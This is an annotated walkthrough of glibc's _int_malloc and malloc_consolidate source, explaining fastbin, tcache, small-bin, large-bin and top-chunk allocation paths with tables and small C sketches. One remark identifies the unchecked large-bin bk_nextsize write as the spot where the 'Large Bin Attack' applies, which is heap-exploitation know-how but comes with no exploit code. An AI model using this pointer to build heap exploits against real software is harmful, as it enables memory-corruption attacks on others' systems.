INTERNAL_SIZE_T nb; /* normalized request size */ unsigned int idx; /* associated bin index */ mbinptr bin; /* associated bin */ mchunkptr victim; /* inspected/selected chunk */ INTERNAL_SIZE_T size; /* its size */ int victim_index; /* its bin index */ mchunkptr remainder; /* remainder from a split */ unsigned long remainder_size; /* its size */ unsigned int block; /* bit map traverser */ unsigned int bit; /* bit map traverser */ unsigned int map; /* current word of binmap */ mchunkptr fwd; /* misc temp for linking */ mchunkptr bck; /* misc temp for linking */ #if USE_TCACHE size_t tcache_unsorted_count; /* count of unsorted chunks processed */ #endif if (!checked_request2size (bytes, &nb)) { __set_errno (ENOMEM); return NULL; }

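This part mainly declares the local variables.

| Variable | Type | Purpose | Related operation |
| --- | --- | --- | --- |
| nb | INTERNAL_SIZE_T | The user request bytes after alignment, i.e. the actual chunk size including the header | Computed by checked_request2size(bytes, &nb), which enforces MINSIZE and alignment |
| idx | unsigned int | Bin index computed from nb, used to locate the fastbin, small bin or large bin | bin_at(av, idx) returns the matching bin header |
| bin | mbinptr | Header of the bin currently being worked on | Used to walk the list of free chunks |
| victim | mchunkptr | The free chunk selected, which may be handed to the user | Taken from a bin list; its size and state are checked |
| size | INTERNAL_SIZE_T | Actual size of victim, including metadata | Extracted with chunksize(victim) |
| victim_index | int | Index of the bin that victim belongs to | Used when an unsorted chunk is placed into its small or large bin |
| remainder | mchunkptr | Pointer to the part left over after splitting a chunk | If victim is larger than needed, the leftover goes into the unsorted bin |
| remainder_size | unsigned long | Size of the remainder chunk | Used to set the metadata after the split |
| block/bit/map | unsigned int | Temporaries for walking the binmap (a bitmap) to find non-empty bins quickly | Avoids scanning empty bins |
| fwd/bck | mchunkptr | Temporary pointers for doubly linked list operations (such as insertion and removal) | fwd is the next node, bck the previous one |

bytes is then validated and converted into nb by checked_request2size; on failure errno is set to ENOMEM and NULL is returned.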

if (__glibc_unlikely (av == NULL)) { void *p = sysmalloc (nb, av); if (p != NULL) alloc_perturb (p, bytes); return p; }

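If av == NULL there is no usable arena, so the memory is requested directly through sysmalloc, which in this case can only satisfy the request with mmap. (With a valid arena, sysmalloc extends the heap with brk for small requests and maps anonymous memory with mmap for requests at or above the mmap threshold, 128 KB by default.)

alloc_perturb (p, bytes); fills the block with a byte pattern when perturb_byte is set:

alloc_perturb (char *p, size_t n)
{
  if (__glibc_unlikely (perturb_byte))
    memset (p, perturb_byte ^ 0xff, n);
}

Finally the allocated address is returned.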

#define REMOVE_FB(fb, victim, pp) \ do \ { \ victim = pp; \ if (victim == NULL) \ break; \ pp = REVEAL_PTR (victim->fd); \ if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \ malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \ } \ while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \ != victim); \

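- REMOVE_FB removes one chunk from the head of a fastbin and makes the list head point to the next element, retrying with compare-and-exchange until no other thread has interfered.

- Along the way it checks the alignment of the next chunk.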
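The retry loop in REMOVE_FB is a lock-free pop from a singly linked list. A minimal sketch of the same idea using C11 atomics is shown below. The names (node_sketch, push_sketch, pop_sketch) are invented, the safe-linking step (REVEAL_PTR) and the alignment check are omitted, and the sketch does not attempt to address ABA hazards.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>

struct node_sketch { struct node_sketch *fd; };

typedef _Atomic(struct node_sketch *) bin_head_sketch;

/* Push n at the head: retry until the head has not changed underneath us. */
void push_sketch(bin_head_sketch *head, struct node_sketch *n)
{
    struct node_sketch *old = atomic_load_explicit(head, memory_order_relaxed);
    do {
        n->fd = old;
    } while (!atomic_compare_exchange_weak_explicit(
                 head, &old, n, memory_order_release, memory_order_relaxed));
}

/* Pop the head: swing the head pointer from victim to victim->fd. */
struct node_sketch *pop_sketch(bin_head_sketch *head)
{
    struct node_sketch *victim = atomic_load_explicit(head, memory_order_acquire);
    while (victim != NULL
           && !atomic_compare_exchange_weak_explicit(
                  head, &victim, victim->fd,
                  memory_order_acquire, memory_order_acquire))
        ;   /* on failure victim now holds the current head; try again */
    return victim;
}

/* Usage example: returns 1 when nodes come back in LIFO order. */
int pop_demo_sketch(void)
{
    bin_head_sketch head = NULL;
    struct node_sketch a, b;
    push_sketch(&head, &a);
    push_sketch(&head, &b);
    return pop_sketch(&head) == &b
           && pop_sketch(&head) == &a
           && pop_sketch(&head) == NULL;
}
```

The single-threaded path in _int_malloc skips this loop entirely and just rewrites the head pointer, since no other thread can race with it.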

if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) { idx = fastbin_index (nb); mfastbinptr *fb = &fastbin (av, idx); mchunkptr pp; victim = *fb; if (victim != NULL) { if (__glibc_unlikely (misaligned_chunk (victim))) malloc_printerr ("malloc(): unaligned fastbin chunk detected 2"); if (SINGLE_THREAD_P) *fb = REVEAL_PTR (victim->fd); else REMOVE_FB (fb, pp, victim); if (__glibc_likely (victim != NULL)) { size_t victim_idx = fastbin_index (chunksize (victim)); if (__builtin_expect (victim_idx != idx, 0)) malloc_printerr ("malloc(): memory corruption (fast)"); check_remalloced_chunk (av, victim, nb);

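- nb is checked first; if it is within the fastbin size limit (get_max_fast ()), the branch is entered.

- Inside the branch, fb points to the fastbin head for that size, and the first chunk in the bin is assigned to victim.

- misaligned_chunk checks the alignment.

- SINGLE_THREAD_P tests whether the process is single-threaded.

- Single-threaded: the head chunk is removed directly.

- Multi-threaded: the head chunk is removed with the REMOVE_FB macro.

- If victim is not NULL, its size is checked against the bin index ("memory corruption (fast)" on mismatch), and then check_remalloced_chunk runs, a debugging check that does nothing unless MALLOC_DEBUG is enabled.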

#if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL) { if (__glibc_unlikely (misaligned_chunk (tc_victim))) malloc_printerr ("malloc(): unaligned fastbin chunk detected 3"); if (SINGLE_THREAD_P) *fb = REVEAL_PTR (tc_victim->fd); else { REMOVE_FB (fb, pp, tc_victim); if (__glibc_unlikely (tc_victim == NULL)) break; } tcache_put (tc_victim, tc_idx); } } #endif

- In short: while the current fastbin still holds chunks and the matching tcache bin is not full, chunks are moved from the fastbin into the tcache bin, until the fastbin is empty or the tcache bin is full.

void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p;

- The chunk is converted to a user pointer with chunk2mem and returned.

if (in_smallbin_range (nb)) { idx = smallbin_index (nb); bin = bin_at (av, idx); if ((victim = last (bin)) != bin) { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) malloc_printerr ("malloc(): smallbin double linked list corrupted"); set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin; if (av != &main_arena) set_non_main_arena (victim); check_malloced_chunk (av, victim, nb);

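- in_smallbin_range checks whether nb falls in the small-bin size range.

- bin holds the header of the matching small bin. The last chunk in the bin is taken as victim, and the list is checked for integrity (bck->fd must equal victim).

#define set_inuse_bit_at_offset(p, s) (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)

- set_inuse_bit_at_offset marks victim as in use by setting the PREV_INUSE bit in the size field of the chunk that follows it.

- The list pointers are then updated to unlink victim.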
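Taking a chunk from the tail of a small bin, including the bck->fd check, can be sketched with a plain circular doubly linked list. The names below are invented for the example, and where glibc aborts with malloc_printerr the sketch simply returns NULL.

```c
#include <assert.h>
#include <stddef.h>

struct link_sketch { struct link_sketch *fd, *bk; };

/* An empty bin points at itself in both directions. */
void bin_init_sketch(struct link_sketch *bin)
{
    bin->fd = bin->bk = bin;
}

/* Freed chunks are inserted at the front (right after the header). */
void bin_push_front_sketch(struct link_sketch *bin, struct link_sketch *c)
{
    c->fd = bin->fd;
    c->bk = bin;
    bin->fd->bk = c;
    bin->fd = c;
}

/* Take the oldest chunk from the tail. Returns NULL if the bin is empty or
   if the back link is inconsistent (glibc would abort in that case). */
struct link_sketch *bin_take_last_sketch(struct link_sketch *bin)
{
    struct link_sketch *victim = bin->bk;
    if (victim == bin)
        return NULL;                 /* empty bin */
    struct link_sketch *bck = victim->bk;
    if (bck->fd != victim)
        return NULL;                 /* "smallbin double linked list corrupted" */
    bin->bk = bck;
    bck->fd = bin;
    return victim;
}

/* Usage example: returns 1 when chunks leave the bin in FIFO order. */
int smallbin_demo_sketch(void)
{
    struct link_sketch bin, a, b;
    bin_init_sketch(&bin);
    bin_push_front_sketch(&bin, &a);
    bin_push_front_sketch(&bin, &b);
    return bin_take_last_sketch(&bin) == &a
           && bin_take_last_sketch(&bin) == &b
           && bin_take_last_sketch(&bin) == NULL;
}

/* Usage example: returns 1 when a forged back link is rejected. */
int smallbin_corrupt_demo_sketch(void)
{
    struct link_sketch bin, a, b;
    bin_init_sketch(&bin);
    bin_push_front_sketch(&bin, &a);
    bin_push_front_sketch(&bin, &b);
    b.fd = &b;                       /* break the invariant b.fd == &a */
    return bin_take_last_sketch(&bin) == NULL;
}
```

Inserting at the front and removing from the back gives small bins their FIFO behavior, in contrast to the LIFO fastbins and tcache.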

#if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset (tc_victim, nb); if (av != &main_arena) set_non_main_arena (tc_victim); bin->bk = bck; bck->fd = bin; tcache_put (tc_victim, tc_idx); } } } #endif

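- This does much the same as the fastbin-to-tcache stashing above: remaining chunks of the same size are moved from the small bin into the tcache bin.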

else { idx = largebin_index (nb); if (atomic_load_relaxed (&av->have_fastchunks)) malloc_consolidate (av); }

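- idx is set to the large bin index for nb.

- atomic_load_relaxed reads have_fastchunks to see whether the arena holds fastbin chunks that have not been consolidated. The flag is set to true with atomic_store_relaxed when a chunk is freed into a fastbin.

- If such chunks exist, malloc_consolidate is called to merge them.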

#if USE_TCACHE INTERNAL_SIZE_T tcache_nb = 0; size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) tcache_nb = nb; int return_cached = 0; tcache_unsorted_count = 0; #endif

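- tcache_nb records whether the requested size nb is eligible for the tcache: it is set to nb if so, and stays 0 otherwise.

- return_cached later marks whether a chunk should be returned from the tcache (initialized to 0 here).

- tcache_unsorted_count is the counter of unsorted-bin chunks processed, reset to 0 here.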

for (;; ) { int iters = 0; while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) { bck = victim->bk; size = chunksize (victim); mchunkptr next = chunk_at_offset (victim, size); if (__glibc_unlikely (size <= CHUNK_HDR_SZ) || __glibc_unlikely (size > av->system_mem)) malloc_printerr ("malloc(): invalid size (unsorted)"); if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ) || __glibc_unlikely (chunksize_nomask (next) > av->system_mem)) malloc_printerr ("malloc(): invalid next size (unsorted)"); if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size)) malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)"); if (__glibc_unlikely (bck->fd != victim) || __glibc_unlikely (victim->fd != unsorted_chunks (av))) malloc_printerr ("malloc(): unsorted double linked list corrupted"); if (__glibc_unlikely (prev_inuse (next))) malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

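for (;; ) is one large loop that runs until _int_malloc returns. The inner while walks the unsorted bin until it gets back to the list header. For each chunk it checks size, the next chunk's size, next->prev_size, the integrity of the linked list, and the prev_inuse bit.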

if (in_smallbin_range (nb) && bck == unsorted_chunks (av) && victim == av->last_remainder && (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) { /* split and reattach remainder */ remainder_size = size - nb; remainder = chunk_at_offset (victim, nb); unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; av->last_remainder = remainder; remainder->bk = remainder->fd = unsorted_chunks (av); if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; } set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); set_foot (remainder, remainder_size); check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; }

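- The branch is taken when nb is in the small-bin range, the unsorted bin holds only this one chunk, that chunk is av->last_remainder, and size is greater than nb + MINSIZE.

- The chunk is split and the leftover becomes the new last_remainder.

- The chunk headers of victim and remainder are set, and set_foot writes the prev_size field of the chunk that follows remainder.

- The pointer to the split-off chunk is then returned.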
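The header bookkeeping of such a split can be sketched on a raw buffer. The struct and function names below are invented for illustration, MINSIZE is assumed to be 32, and the unsorted-bin relinking and the NON_MAIN_ARENA flag are left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define PREV_INUSE_SKETCH ((size_t)1)
#define MINSIZE_SP_SKETCH ((size_t)32)   /* assumed 64-bit MINSIZE */

struct hdr_sketch { size_t prev_size; size_t size; };

/* Equivalent of chunk_at_offset: treat p + off as a chunk header. */
struct hdr_sketch *at_offset_sketch(struct hdr_sketch *p, size_t off)
{
    return (struct hdr_sketch *)((char *)p + off);
}

/* Split victim (size bytes in total) into an nb-byte chunk and a remainder.
   Returns the remainder, or NULL if the chunk is not large enough to split. */
struct hdr_sketch *split_chunk_sketch(struct hdr_sketch *victim,
                                      size_t size, size_t nb)
{
    if (size <= nb + MINSIZE_SP_SKETCH)
        return NULL;
    size_t remainder_size = size - nb;
    struct hdr_sketch *remainder = at_offset_sketch(victim, nb);
    victim->size = nb | PREV_INUSE_SKETCH;                   /* set_head (victim) */
    remainder->size = remainder_size | PREV_INUSE_SKETCH;    /* set_head (remainder) */
    /* set_foot: record the remainder's size in the chunk that follows it. */
    at_offset_sketch(remainder, remainder_size)->prev_size = remainder_size;
    return remainder;
}

/* Usage example: split a 0x100-byte chunk into 0x40 + 0xc0; returns 1 on success. */
int split_demo_sketch(void)
{
    size_t size = 0x100, nb = 0x40;
    /* Extra room for the header of the chunk that follows. */
    struct hdr_sketch *victim = malloc(size + sizeof(struct hdr_sketch));
    if (victim == NULL)
        return 0;
    struct hdr_sketch *rem = split_chunk_sketch(victim, size, nb);
    int ok = rem != NULL
             && (char *)rem == (char *)victim + nb
             && victim->size == (nb | PREV_INUSE_SKETCH)
             && rem->size == ((size - nb) | PREV_INUSE_SKETCH)
             && at_offset_sketch(victim, size)->prev_size == size - nb;
    free(victim);
    return ok;
}
```

The remainder keeps PREV_INUSE set because the chunk in front of it (victim) is about to be handed to the user.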

if (__glibc_unlikely (bck->fd != victim)) malloc_printerr ("malloc(): corrupted unsorted chunks 3"); unsorted_chunks (av)->bk = bck; bck->fd = unsorted_chunks (av);

- The list is checked for integrity, and victim is then removed from the unsorted list.

if (size == nb) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) set_non_main_arena (victim); #if USE_TCACHE /* Fill cache first, return to user only if cache fills. We may return one of these chunks later. */ if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put (victim, tc_idx); return_cached = 1; continue; } else { #endif check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; #if USE_TCACHE } #endif }

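- If the unsorted chunk's size is exactly the requested size nb, the branch is entered.

- set_inuse_bit_at_offset sets the prev_inuse bit of the next chunk to 1.

- If nb is within the tcache range and the matching tcache bin is not full, the chunk is put into the tcache bin, return_cached is set, and continue moves on to the next unsorted chunk.

- Otherwise the pointer is returned directly.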

if (in_smallbin_range (size)) { victim_index = smallbin_index (size); bck = bin_at (av, victim_index); fwd = bck->fd; }

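- If the chunk's size is in the small-bin range, the matching index is computed; bck is set to the bin header and fwd to the first chunk in that bin, so the chunk will be inserted at the front.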

{ victim_index = largebin_index (size); bck = bin_at (av, victim_index); fwd = bck->fd; /* maintain large bins in sorted order */ if (fwd != bck) { /* Or with inuse bit to speed comparisons */ size |= PREV_INUSE; /* if smaller than smallest, bypass loop below */ assert (chunk_main_arena (bck->bk)); if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) { fwd = bck; bck = bck->bk; victim->fd_nextsize = fwd->fd; victim->bk_nextsize = fwd->fd->bk_nextsize; fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; } else { assert (chunk_main_arena (fwd)); while ((unsigned long) size < chunksize_nomask (fwd)) { fwd = fwd->fd_nextsize; assert (chunk_main_arena (fwd)); } if ((unsigned long) size == (unsigned long) chunksize_nomask (fwd)) /* Always insert in the second position. */ fwd = fwd->fd; else { victim->fd_nextsize = fwd; victim->bk_nextsize = fwd->bk_nextsize; if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd)) malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)"); fwd->bk_nextsize = victim; victim->bk_nextsize->fd_nextsize = victim; } bck = fwd->bk; if (bck->fd != fwd) malloc_printerr ("malloc(): largebin double linked list corrupted (bk)"); } } else victim->fd_nextsize = victim->bk_nextsize = victim; }

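The first three lines are handled the same way as in the small-bin case.

if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)): if size is smaller than the smallest chunk in the large bin, the chunk is inserted at the tail directly; otherwise the loop walks fd_nextsize to find the right position. The doubly linked lists are then checked for integrity.

If the large bin is empty, victim's fd_nextsize and bk_nextsize simply point to victim itself.

fwd = bck; bck = bck->bk; victim->fd_nextsize = fwd->fd; victim->bk_nextsize = fwd->fd->bk_nextsize; fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;

This is where the Large Bin Attack applies: this tail-insertion path writes through bk_nextsize without any integrity check.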

mark_bin (av, victim_index); victim->bk = bck; victim->fd = fwd; fwd->bk = victim; bck->fd = victim;

- The chunk is linked into the bin between bck and fwd, and mark_bin sets the bin's bit in the binmap.

#if USE_TCACHE /* If we've processed as many chunks as we're allowed while filling the cache, return one of the cached ones. */ ++tcache_unsorted_count; if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit) { return tcache_get (tc_idx); } #endif #define MAX_ITERS 10000 if (++iters >= MAX_ITERS) break; #if USE_TCACHE /* If all the small chunks we found ended up cached, return one now. */ if (return_cached) { return tcache_get (tc_idx); } #endif

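- tcache_unsorted_count limits how many unsorted chunks are processed while the tcache is being filled. Once return_cached is set and the count exceeds mp_.tcache_unsorted_limit (when that limit is nonzero), a cached chunk is returned with tcache_get.

- iters caps the loop at MAX_ITERS (10000) chunks per call, so a very long or maliciously crafted unsorted bin cannot keep the loop running indefinitely.

- After the loop, if the return_cached flag is set, a chunk is taken from the matching tcache bin and returned, skipping the remaining allocation paths.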

if (!in_smallbin_range (nb)) { bin = bin_at (av, idx); /* skip scan if empty or largest chunk is too small */ if ((victim = first (bin)) != bin && (unsigned long) chunksize_nomask (victim) >= (unsigned long) (nb)) { victim = victim->bk_nextsize; while (((unsigned long) (size = chunksize (victim)) < (unsigned long) (nb))) victim = victim->bk_nextsize; /* Avoid removing the first entry for a size so that the skip list does not have to be rerouted. */ if (victim != last (bin) && chunksize_nomask (victim) == chunksize_nomask (victim->fd)) victim = victim->fd; remainder_size = size - nb; unlink_chunk (av, victim); /* Exhaust */ if (remainder_size < MINSIZE) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) set_non_main_arena (victim); } /* Split */ else { remainder = chunk_at_offset (victim, nb); /* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */ bck = unsorted_chunks (av); fwd = bck->fd; if (__glibc_unlikely (fwd->bk != bck)) malloc_printerr ("malloc(): corrupted unsorted chunks"); remainder->bk = bck; remainder->fd = fwd; bck->fd = remainder; fwd->bk = remainder; if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; } set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); set_foot (remainder, remainder_size); } check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } }

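- If the large bin is empty or its largest chunk is smaller than nb, the scan is skipped.

- Otherwise the bin is walked from the smallest chunk upward to find the first chunk whose size is at least nb. If what would be left after the allocation is smaller than MINSIZE, set_inuse_bit_at_offset is called and the whole chunk is used up. Otherwise the chunk is split and the remainder goes into the unsorted bin; if the remainder's size is still in the large-bin range, its fd_nextsize and bk_nextsize are cleared. After the headers are set, the pointer p is returned.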

if (bit > map || bit == 0) { do { if (++block >= BINMAPSIZE) /* out of bins */ goto use_top; } while ((map = av->binmap[block]) == 0); bin = bin_at (av, (block << BINMAPSHIFT)); bit = 1; } /* Advance to bin with set bit. There must be one. */ while ((bit & map) == 0) { bin = next_bin (bin); bit <<= 1; assert (bit != 0); } /* Inspect the bin. It is likely to be non-empty */ victim = last (bin);

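- The loop looks for the next non-empty block of the binmap; if none is found, it jumps to use_top.

- The bit mask test bit & map locates the first non-empty bin, and next_bin advances the bin pointer alongside.

- Large bins are kept in descending size order with the smallest chunk at the tail, so last (bin) is the chunk inspected first to see whether it satisfies the request.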
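The binmap search can be sketched as a function that returns the index of the next marked bin at or above a starting index. The macros mirror glibc's idx2block and idx2bit under the assumption of 128 bins and 32-bit map words; the function names are invented, and the sketch returns an index instead of advancing a bin pointer.

```c
#include <assert.h>

#define NBINS_BM_SKETCH      128
#define BINMAPSHIFT_SKETCH   5
#define BITSPERMAP_SKETCH    (1U << BINMAPSHIFT_SKETCH)
#define BINMAPSIZE_SKETCH    (NBINS_BM_SKETCH / BITSPERMAP_SKETCH)

#define idx2block_sketch(i)  ((i) >> BINMAPSHIFT_SKETCH)
#define idx2bit_sketch(i)    (1U << ((i) & (BITSPERMAP_SKETCH - 1)))

/* Record that bin i may be non-empty (what mark_bin does). */
void mark_bin_sketch(unsigned int binmap[BINMAPSIZE_SKETCH], unsigned int i)
{
    binmap[idx2block_sketch(i)] |= idx2bit_sketch(i);
}

/* Return the first marked bin with index >= idx, or -1 if there is none
   (in which case _int_malloc would fall through to use_top). */
int next_marked_bin_sketch(const unsigned int binmap[BINMAPSIZE_SKETCH],
                           unsigned int idx)
{
    unsigned int block = idx2block_sketch(idx);
    unsigned int bit = idx2bit_sketch(idx);
    unsigned int map = binmap[block];
    unsigned int pos = idx & (BITSPERMAP_SKETCH - 1);

    /* bit > map means no bit at or above our position is set in this word. */
    if (bit > map) {
        do {
            if (++block >= BINMAPSIZE_SKETCH)
                return -1;                    /* out of bins */
        } while ((map = binmap[block]) == 0);
        bit = 1;
        pos = 0;
    }

    /* Advance to the set bit; one is guaranteed to exist at this point. */
    while ((bit & map) == 0) {
        bit <<= 1;
        ++pos;
    }
    return (int)((block << BINMAPSHIFT_SKETCH) + pos);
}

/* Usage example: with only bin 70 marked; returns 1 when all lookups agree. */
int binmap_demo_sketch(void)
{
    unsigned int binmap[BINMAPSIZE_SKETCH] = { 0 };
    if (next_marked_bin_sketch(binmap, 2) != -1)
        return 0;
    mark_bin_sketch(binmap, 70);
    return next_marked_bin_sketch(binmap, 3) == 70
           && next_marked_bin_sketch(binmap, 65) == 70
           && next_marked_bin_sketch(binmap, 70) == 70
           && next_marked_bin_sketch(binmap, 71) == -1;
}
```

One word comparison skips up to 32 empty bins at a time, which is the speed-up the binmap exists for.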

if (victim == bin) { av->binmap[block] = map &= ~bit; /* Write through */ bin = next_bin (bin); bit <<= 1; }

- When victim equals the bin header (the bin is actually empty), the bin's bit is cleared in the binmap and the bin is skipped.

else { size = chunksize (victim); /* We know the first chunk in this bin is big enough to use. */ assert ((unsigned long) (size) >= (unsigned long) (nb)); remainder_size = size - nb; /* unlink */ unlink_chunk (av, victim); /* Exhaust */ if (remainder_size < MINSIZE) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) set_non_main_arena (victim); } /* Split */ else { remainder = chunk_at_offset (victim, nb); /* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */ bck = unsorted_chunks (av); fwd = bck->fd; if (__glibc_unlikely (fwd->bk != bck)) malloc_printerr ("malloc(): corrupted unsorted chunks 2"); remainder->bk = bck; remainder->fd = fwd; bck->fd = remainder; fwd->bk = remainder; /* advertise as last remainder */ if (in_smallbin_range (nb)) av->last_remainder = remainder; if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; } set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); set_foot (remainder, remainder_size); } check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; }

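- If the remainder would be smaller than MINSIZE, the whole chunk is used up.

- Otherwise the chunk is split; the remainder is inserted into the unsorted bin, recorded as last_remainder when nb is in the small-bin range, and has its nextsize pointers cleared when it is large-bin sized.

- Finally p is returned.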

use_top: victim = av->top; size = chunksize (victim); if (__glibc_unlikely (size > av->system_mem)) malloc_printerr ("malloc(): corrupted top size"); if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) { remainder_size = size - nb; remainder = chunk_at_offset (victim, nb); av->top = remainder; set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } /* When we are using atomic ops to free fast chunks we can get here for all block sizes. */ else if (atomic_load_relaxed (&av->have_fastchunks)) { malloc_consolidate (av); /* restore original bin index */ if (in_smallbin_range (nb)) idx = smallbin_index (nb); else idx = largebin_index (nb); } /* Otherwise, relay to handle system-dependent cases */ else { void *p = sysmalloc (nb, av); if (p != NULL) alloc_perturb (p, bytes); return p; } }

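- The top chunk's size is sanity-checked against av->system_mem. If the size is at least nb + MINSIZE, the top chunk is split: the front part is returned as p and the rest becomes the new top.

- Otherwise, if the arena's have_fastchunks flag is true (there are fastbin chunks that have not been consolidated), malloc_consolidate merges them, the bin index is recomputed, and the outer loop tries again.

- Otherwise (no fastbin chunks are left to consolidate), sysmalloc is called to obtain more memory from the system.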

malloc.c/malloc_consolidate

static void malloc_consolidate(mstate av)

{

mfastbinptr* fb; /* current fastbin being consolidated */

mfastbinptr* maxfb; /* last fastbin (for loop control) */

mchunkptr p; /* current chunk being consolidated */

mchunkptr nextp; /* next chunk to consolidate */

mchunkptr unsorted_bin; /* bin header */

mchunkptr first_unsorted; /* chunk to link to */

/* These have same use as in free() */

mchunkptr nextchunk;

INTERNAL_SIZE_T size;

INTERNAL_SIZE_T nextsize;

INTERNAL_SIZE_T prevsize;

int nextinuse;

atomic_store_relaxed (&av->have_fastchunks, false);

unsorted_bin = unsorted_chunks(av);

/*

Remove each chunk from fast bin and consolidate it, placing it

then in unsorted bin. Among other reasons for doing this,

placing in unsorted bin avoids needing to calculate actual bins

until malloc is sure that chunks aren't immediately going to be

reused anyway.

*/

maxfb = &fastbin (av, NFASTBINS - 1);

fb = &fastbin (av, 0);

do {

p = atomic_exchange_acq (fb, NULL);

if (p != 0) {

do {

{

if (__glibc_unlikely (misaligned_chunk (p)))

malloc_printerr ("malloc_consolidate(): "

"unaligned fastbin chunk detected");

unsigned int idx = fastbin_index (chunksize (p));

if ((&fastbin (av, idx)) != fb)

malloc_printerr ("malloc_consolidate(): invalid chunk size");

}

check_inuse_chunk(av, p);

nextp = REVEAL_PTR (p->fd);

/* Slightly streamlined version of consolidation code in free() */

size = chunksize (p);

nextchunk = chunk_at_offset(p, size);

nextsize = chunksize(nextchunk);

if (!prev_inuse(p)) {

prevsize = prev_size (p);

size += prevsize;

p = chunk_at_offset(p, -((long) prevsize));

if (__glibc_unlikely (chunksize(p) != prevsize))

malloc_printerr ("corrupted size vs. prev_size in fastbins");

unlink_chunk (av, p);

}

if (nextchunk != av->top) {

nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

if (!nextinuse) {

size += nextsize;

unlink_chunk (av, nextchunk);

} else

clear_inuse_bit_at_offset(nextchunk, 0);

first_unsorted = unsorted_bin->fd;

unsorted_bin->fd = p;

first_unsorted->bk = p;

if (!in_smallbin_range (size)) {

p->fd_nextsize = NULL;

p->bk_nextsize = NULL;

}

set_head(p, size | PREV_INUSE);

p->bk = unsorted_bin;

p->fd = first_unsorted;

set_foot(p, size);

}

else {

size += nextsize;

set_head(p, size | PREV_INUSE);

av->top = p;

}

} while ( (p = nextp) != 0);

}

} while (fb++ != maxfb);

}

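| Variable | Type | Purpose |
|---|---|---|
| fb | mfastbinptr* | Points to the head of the fastbin currently being consolidated; used to walk the fastbins. |
| maxfb | mfastbinptr* | Points to the head of the last fastbin; used as the loop bound. |
| p | mchunkptr | The free chunk currently being processed: taken from the fastbin and consolidated with its neighbours where possible. |
| nextp | mchunkptr | The next chunk on the same fastbin list (read from p->fd), processed after p. |
| unsorted_bin | mchunkptr | Head of the unsorted bin; consolidated chunks are inserted here. |
| first_unsorted | mchunkptr | Temporary pointer to the old first chunk of the unsorted bin, used while linking p at the head. |
| nextchunk | mchunkptr | Same use as in free(): the chunk physically following p, checked for forward consolidation. |
| size | INTERNAL_SIZE_T | Size of the current chunk p (including metadata), obtained with chunksize(p). |
| nextsize | INTERNAL_SIZE_T | Size of nextchunk. |
| prevsize | INTERNAL_SIZE_T | Size of the previous chunk when it is free, read from the prev_size field. |
| nextinuse | int | Whether nextchunk is in use, read from the PREV_INUSE bit of the chunk after nextchunk. |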

- atomic_store_relaxed (&av->have_fastchunks, false); clears the flag, recording that the arena no longer holds unconsolidated fastbin chunks.

